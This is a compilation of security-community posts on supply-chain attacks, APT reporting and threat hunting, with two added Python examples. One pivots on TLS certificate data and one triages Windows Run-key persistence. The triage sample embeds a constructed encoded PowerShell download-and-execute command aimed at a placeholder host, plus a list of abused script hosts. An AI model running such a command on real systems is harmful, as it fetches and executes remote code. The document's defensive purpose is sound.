The Checkmarx KICS compromise involved multichannel poisoning—Docker Hub, VS Code, GitHub Actions—culminating in a downstream Bitwarden attack. Learn how credential theft is operationalized in this analysis by TrendAI™ Research: https://t.co/jrSBUugCiY
Let's start a threat-hunting thread where we reveal some of our secret hunting methods. I'll start first.
Check SSL info on IP webscans. This way you can find configured domains from threat actors on confirmed malicious IP infrastructure.
You can also pivot beyond Cloudflare.
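The pivot described in the post above, as an added example that is not the poster's own tooling: start from a confirmed-malicious IP, collect the CN and SAN names from the certificates its open ports present, then walk the scan data for every other IP that serves the same names or the same certificate fingerprint. A Cloudflare edge in that set is marked as such, so the non-CDN hosts that remain are origin candidates. The scan records, IPs, domains and fingerprints below are constructed to mimic the fields an IP webscan returns; none of them are real.

```python
"""Pivot: malicious IP -> TLS cert names/fingerprints -> other hosts (incl. origins
behind a CDN edge). Added example; records are constructed, not real scan data."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanRecord:
    ip: str
    port: int
    subject_cn: str
    sans: tuple          # subjectAltName dNSName entries
    sha256: str          # certificate fingerprint as reported by the scanner
    cdn: str = ""        # e.g. "cloudflare" when the IP is a CDN edge (constructed tag)


# Constructed sample. 203.0.113.10 is the confirmed-malicious host; 198.51.100.7
# is a Cloudflare edge fronting one of its domains; 192.0.2.44 serves the same
# names directly and is therefore the origin candidate. 192.0.2.99 is unrelated.
SCAN_RECORDS = [
    ScanRecord("203.0.113.10", 443, "update-portal.example",
               ("update-portal.example", "cdn.update-portal.example"), "aa" * 32),
    ScanRecord("203.0.113.10", 8443, "c2-admin.example", ("c2-admin.example",), "bb" * 32),
    ScanRecord("198.51.100.7", 443, "update-portal.example",
               ("update-portal.example",), "cc" * 32, cdn="cloudflare"),
    ScanRecord("192.0.2.44", 443, "cdn.update-portal.example",
               ("cdn.update-portal.example", "stage.update-portal.example"), "dd" * 32),
    ScanRecord("192.0.2.99", 443, "shop.unrelated.example", ("shop.unrelated.example",), "ee" * 32),
]


def cert_domains(rec: ScanRecord) -> set:
    """CN plus SANs, lower-cased, wildcard prefix stripped so *.x and x collide."""
    names = {rec.subject_cn, *rec.sans}
    return {n.lower().lstrip("*.") for n in names if n}


def build_indexes(records):
    """Inverted indexes: domain -> IPs serving it, fingerprint -> IPs serving it."""
    by_domain, by_fp = defaultdict(set), defaultdict(set)
    for rec in records:
        by_fp[rec.sha256].add(rec.ip)
        for d in cert_domains(rec):
            by_domain[d].add(rec.ip)
    return by_domain, by_fp


def pivot(records, seed_ip: str, max_hops: int = 2) -> dict:
    """Breadth-first expansion from seed_ip over shared cert names and fingerprints.

    CDN edges are kept as related infrastructure (their SANs are what let you
    pivot) but excluded from origin_candidates.
    """
    by_domain, by_fp = build_indexes(records)
    by_ip = defaultdict(list)
    for rec in records:
        by_ip[rec.ip].append(rec)

    seen_ips, seen_domains, seen_fps = {seed_ip}, set(), set()
    frontier = [seed_ip]
    for _ in range(max_hops):
        for ip in frontier:
            for rec in by_ip[ip]:
                seen_fps.add(rec.sha256)
                seen_domains |= cert_domains(rec)
        candidates = set()
        for fp in seen_fps:
            candidates |= by_fp[fp]
        for d in seen_domains:
            candidates |= by_domain[d]
        new = candidates - seen_ips
        if not new:
            break
        seen_ips |= new
        frontier = sorted(new)

    cdn_edges = {ip for ip in seen_ips if any(r.cdn for r in by_ip[ip])}
    related = seen_ips - {seed_ip}
    return {
        "domains": sorted(seen_domains),
        "fingerprints": sorted(seen_fps),
        "related_ips": sorted(related),
        "cdn_edges": sorted(cdn_edges),
        "origin_candidates": sorted(related - cdn_edges),
    }


if __name__ == "__main__":
    for k, v in pivot(SCAN_RECORDS, "203.0.113.10").items():
        print(f"{k:18} {v}")
```

The domain overlap is what carries the pivot past Cloudflare: the edge presents a Cloudflare-issued certificate (different fingerprint), but its SAN list still names the customer's domain, and the same name on a non-CDN IP in the scan data is the origin to look at next. Treat fingerprint matches as stronger than name matches, since shared hosting and CDN certs bundle unrelated names.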
The FLARE team now freely distributes its quality reverse engineering and malware analysis educational content at https://t.co/bGCIjBfD3C. Launched with:
- Malware Analysis Crash Course
- Go Reversing Reference
- Intro to TTD
The Axios supply chain attack is cross-platform, affecting Windows, Linux, and macOS. From a forensic perspective, the same techniques we cover in the official 13Cubed training courses can help identify compromised hosts and detect potential post-exploitation activity. Even the good ole' Windows Run key is abused. As always, Huntress has an excellent writeup: https://t.co/cPUjClvsXV
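Run-key triage as an added example, not the Huntress or 13Cubed material: parse the text `reg query` prints for a `...\CurrentVersion\Run` key, then score each value on the signals an analyst checks first (script host or LOLBin, hidden window, execution-policy bypass, `-EncodedCommand` payload, binary living under a user-writable path) and decode any encoded PowerShell inline. The registry output, value names and command lines are constructed; nothing here reproduces the actual Axios payload.

```python
"""Triage of Run-key values from `reg query` output. Added example; the sample
registry dump below is constructed and does not describe any real malware."""
import base64
import re

# Constructed encoded payload, built here rather than hand-typed so the base64 is valid.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16le")).decode()

# Constructed `reg query HKCU\...\Run` output. OneDrive is the benign control.
SAMPLE_REG_QUERY = f"""
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    Updater    REG_SZ    powershell.exe -w hidden -ep bypass -enc {_ENCODED}
    SecurityHealth    REG_EXPAND_SZ    %ProgramFiles%\\Windows Defender\\MSASCuiL.exe
    node_helper    REG_SZ    "C:\\Users\\alice\\AppData\\Roaming\\npm\\node.exe" "C:\\Users\\alice\\AppData\\Local\\Temp\\x.js"
"""

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "node.exe")
RE_ENC = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
RE_HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
RE_BYPASS = re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass")


def parse_reg_query(text: str) -> list:
    """Return [(key, name, type, data)] from `reg query` text output."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY"):
            key = line.strip()
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append((key, parts[0], parts[1], parts[2]))
    return entries


def decode_encoded_command(data: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = RE_ENC.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage(entries: list) -> list:
    """Score each Run value; higher score = look at it first."""
    results = []
    for key, name, _type, data in entries:
        low = data.lower()
        reasons = []
        if any(h in low for h in SCRIPT_HOSTS):
            reasons.append("script host / LOLBin")
        if RE_HIDDEN.search(data):
            reasons.append("hidden window")
        if RE_BYPASS.search(data):
            reasons.append("execution policy bypass")
        decoded = decode_encoded_command(data)
        if decoded is not None:
            reasons.append("encoded command")
        if any(p in low for p in USER_WRITABLE):
            reasons.append("binary/script in user-writable path")
        results.append({"key": key, "name": name, "data": data,
                        "reasons": reasons, "score": len(reasons), "decoded": decoded})
    return sorted(results, key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"[{r['score']}] {r['name']}: {', '.join(r['reasons']) or 'no findings'}")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

A single "user-writable path" hit is mostly noise (OneDrive legitimately lives under AppData), so allowlist known-good entries rather than alerting on score 1; the combination of an interpreter, a hidden window and an encoded or Temp-resident payload is what warrants pulling the host.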
APT confirmation used to take hours. Now it takes 4 minutes.
Attack Discovery correlates alerts into a single narrative.
A workflow triggers the agent.
The agent:
• Looks up the hash on VirusTotal
• Runs ES|QL queries across your logs
• Finds the on-call analyst
• Creates a case
• Opens a Slack incident channel
All before you read the threat intel report.
Fresh *CLICKFIX* coffee brewing 😂
This one just showed up on my radar; defenders, you know what to do with it 🤭
coffeemaxusa[.]com
#cybersecurity #clickfix #defender
MuddyWater is no longer the noisy PowerShell actor defenders once knew.
Over the past two years, the Iran-linked threat actor MuddyWater has evolved significantly,
moving from basic phishing and script-heavy intrusions to multi-stage operations using Rust-based implants and custom backdoors.
FalconFeeds telemetry shows MuddyWater activity clustering around key Iran–Israel and Iran–GCC escalation windows, suggesting its operations are closely aligned with geopolitical tensions.
More importantly, MuddyWater appears to play a strategic role in Iran's cyber ecosystem: harvesting credentials and network access before handing footholds to higher-tier operators.
Read the full analysis in the blog → https://t.co/SyPcjwm36E
For SOC and CTI teams, this evolution highlights how persistent actors adapt quickly.
#CyberThreatIntelligence #ThreatIntelligence #APT #Iran #CyberWarfare #SOC #MITREATTACK #falconfeeds
New blog! We found an open directory attributed to #MuddyWater Iranian APT and found vulnerabilities/victims they've been targeting, red-team tools, and a loader that deploys a persistent variant of #Tsundere botnet - a MaaS sold by a Russian threat actor that is known for using #EtherHiding to store C2 addresses on the Ethereum blockchain.
https://t.co/45X2IIlkgB
Iran-linked Handala Hack (aka Void Manticore, COBALT MYSTIQUE) is a reported vector for an increase in wiper attacks. This Insights blog details proactive recommendations for security teams, from identity management to enhancing security controls. https://t.co/5KhvzN5f5K
25 Linux commands every DevOps engineer should know, and when you actually use them:
1. top / htop: see what's eating CPU and memory right now
2. ps aux: list every running process with ownership
3. lsof -i: see which process owns which port
4. ss -tulnp: active connections and listening sockets
5. netstat -rn: routing table, useful when traffic goes nowhere
6. tcpdump: capture actual packets when curl lies to you
7. strace: trace system calls, last resort debugging
8. dmesg -T: kernel messages, OOM kills show up here
9. journalctl -b -1: logs from the previous boot
10. df -h / du -sh: disk usage before you get a "no space left" alert
11. free -m: memory overview including buffers and cache
12. vmstat 1: real-time CPU, memory, IO snapshot
13. iotop: which process is hammering disk
14. uptime: load averages, quick node health check
15. who / last: who logged in and when
16. curl -v: full HTTP request/response including headers and TLS
17. dig / nslookup: DNS resolution debugging
18. traceroute / mtr: packet path and where it breaks
19. iptables -L: firewall rules, often the silent culprit
20. systemctl status: service state, last logs, exit codes
21. crontab -l: scheduled jobs, often forgotten until they break
22. find / -name: locate files across the system
23. tar -xvf / gzip: compress, extract, move things around
24. chmod / chown: permission fixes, classic junior task
25. env / printenv: check what environment variables are actually set
You don't need to memorize all of them.
But if one of these saves you 20 minutes during an incident, it was worth knowing.
🎉New report out Monday 2/23 by @malforsec, @lapadrino, and @PeteO!
"The Base64 string $dsU contained the shellcode. We decoded it and used SpeakEasy..."
If you would like to be notified when we publish the report 👉️ https://t.co/oPX1ir9O13
#DFIR #IncidentResponse
We just cancelled our Cybersecurity subscriptions.
CrowdStrike. Cloudflare. Okta. All gone. We save over 4M/yr as a company.
Instead I just use Claude Code to handle all security measures.
We just gave up all our sensitive user data. I am being personally sued by the FTC and am writing this from an undisclosed location.